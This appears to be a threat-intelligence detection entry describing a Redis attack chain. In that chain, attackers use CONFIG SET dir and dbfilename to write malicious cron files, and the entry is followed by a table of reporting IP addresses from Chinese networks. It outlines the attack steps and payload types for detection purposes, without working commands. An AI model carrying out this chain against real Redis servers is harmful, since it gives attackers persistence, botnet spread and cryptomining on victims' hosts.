Loading threats
Identifies a complete Redis exploitation workflow where an attacker performs configuration introspection, modifies snapshot directory and filename parameters (CONFIG SET dir, CONFIG SET dbfilename), targets system cron directories (e.g., /etc/cron.d, /etc, crontabs), implants scheduled execution payloads (HTTP pipe-to-shell, wget, root cron variants, or obfuscated droppers), and triggers SAVE to write the malicious cron file to disk. This tightly coupled sequence reflects automated host-level persistence establishment via cron injection through misconfigured or unauthenticated Redis services. The behavior captures filesystem redirection, scheduled execution staging, and persistence activation in a single deterministic chain, strongly associated with botnet propagation and cryptomining campaigns.
| IP Address | Risk | Events | Sessions | Country | ASN | Last Seen |
|---|---|---|---|---|---|---|
| 182.40.103.253 | 100% | 1,412 | 459 | 🇨🇳 CN | AS136195 | 2026-04-26 |
| 218.78.131.154 | 100% | 955 | 564 | 🇨🇳 CN | AS4812 | 2026-04-26 |
| 14.103.220.97 | 100% | 893 | 333 | 🇨🇳 CN | AS4811 | 2026-04-25 |
| 14.103.198.15 | 100% | 710 | 195 | 🇨🇳 CN | AS4811 | 2026-04-26 |
| 182.92.181.218 | 100% | 506 | 181 | 🇨🇳 CN |
| AS37963 |
| 2026-04-25 |
| 125.67.236.54 | 99% | 458 | 165 | 🇨🇳 CN | AS4134 | 2026-03-11 |
| 120.48.43.118 | 98% | 427 | 209 | 🇨🇳 CN | AS38365 | 2026-04-26 |
| 180.76.52.82 | 94% | 345 | 193 | 🇨🇳 CN | AS38365 | 2026-04-25 |
| 117.50.47.100 | 95% | 313 | 102 | 🇨🇳 CN | AS4808 | 2026-04-24 |
| 101.201.124.141 | 98% | 291 | 55 | 🇨🇳 CN | AS37963 | 2026-03-29 |
| 101.201.71.213 | 99% | 256 | 53 | 🇨🇳 CN | AS37963 | 2026-03-30 |
| 39.99.250.21 | 99% | 231 | 51 | 🇨🇳 CN | AS37963 | 2026-02-28 |
| 121.196.225.181 | 98% | 230 | 63 | 🇨🇳 CN | AS37963 | 2026-03-28 |
| 47.92.97.77 | 99% | 228 | 108 | 🇨🇳 CN | AS37963 | 2026-04-21 |
| 8.130.138.41 | 98% | 215 | 55 | 🇨🇳 CN | AS37963 | 2026-03-26 |
| 47.98.205.94 | 96% | 215 | 84 | 🇨🇳 CN | AS37963 | 2026-03-31 |
| 47.117.110.149 | 98% | 210 | 64 | 🇨🇳 CN | AS37963 | 2026-03-31 |
| 47.120.79.252 | 99% | 198 | 56 | 🇨🇳 CN | AS37963 | 2026-03-11 |
| 47.111.110.34 | 98% | 165 | 71 | 🇨🇳 CN | AS37963 | 2026-03-24 |
| 47.94.213.192 | 93% | 128 | 56 | 🇨🇳 CN | AS37963 | 2026-04-05 |